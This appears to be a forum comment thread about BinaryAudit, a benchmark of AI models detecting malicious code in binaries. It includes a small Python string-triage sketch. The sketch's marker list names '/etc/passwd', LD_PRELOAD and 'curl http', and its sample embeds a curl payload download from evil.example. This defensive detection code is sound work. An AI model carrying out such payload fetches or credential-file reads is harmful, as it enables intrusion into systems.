7777332215|7 days ago
This is detecting the pattern of an anomaly in language associated with malicious activity, which is not impressive for an LLM.
stared|7 days ago
The tasks here are entry-level. Still, we are impressed that some AI models can detect these patterns while looking only at binary code. We didn't take that for granted.
For example, only a few models understand Ghidra and Radare2 tooling (Opus 4.5 and 4.6, Gemini 3 Pro, GLM 5) https://quesma.com/benchmarks/binaryaudit/#models-tooling
We consider it a starting point for AI agents being able to work with binaries. Others have found the same; see https://x.com/ccccjjjjeeee/status/2021160492039811300 and https://news.ycombinator.com/item?id=46846101.
There is a long way ahead from "OMG, AI can do that!" to an end-to-end solution.
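To make "detecting patterns while looking at binary code" concrete, here is a minimal sketch of the classic first step of binary triage: pulling printable strings out of raw bytes and flagging suspicious ones. This is not how BinaryAudit or the models actually work, and the suspicious markers are hypothetical examples; it just illustrates the baseline kind of signal the comments above are discussing.

```python
import re

# Hypothetical markers for illustration only, not a real detection list.
SUSPICIOUS = (b"LD_PRELOAD", b"/etc/passwd", b"curl http")

def strings(data: bytes, min_len: int = 6):
    """Return printable-ASCII runs of at least min_len bytes."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)

def flag(data: bytes):
    """Return extracted strings that contain any suspicious marker."""
    return [s for s in strings(data) if any(m in s for m in SUSPICIOUS)]

# Toy "binary": ELF-ish header bytes plus an embedded download command.
sample = b"\x7fELF\x02\x01\x00" + b"curl http://evil.example/payload\x00"
print(flag(sample))  # the embedded curl command is flagged
```

An end-to-end agent goes far beyond this, of course: disassembling, recovering control flow, and reasoning about behavior rather than grepping for strings.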
achille|7 days ago
see:
- https://github.com/QuesmaOrg/BinaryAudit/blob/main/tasks/dns...
- https://github.com/QuesmaOrg/BinaryAudit/blob/main/tasks/dro...
comex|7 days ago
The second one is more impressive. I'd like to see the reasoning trace.
Avamander|7 days ago
If anything, complex logic is what will defeat an LLM. But a good model will also flag such logic as intractable rather than guessing.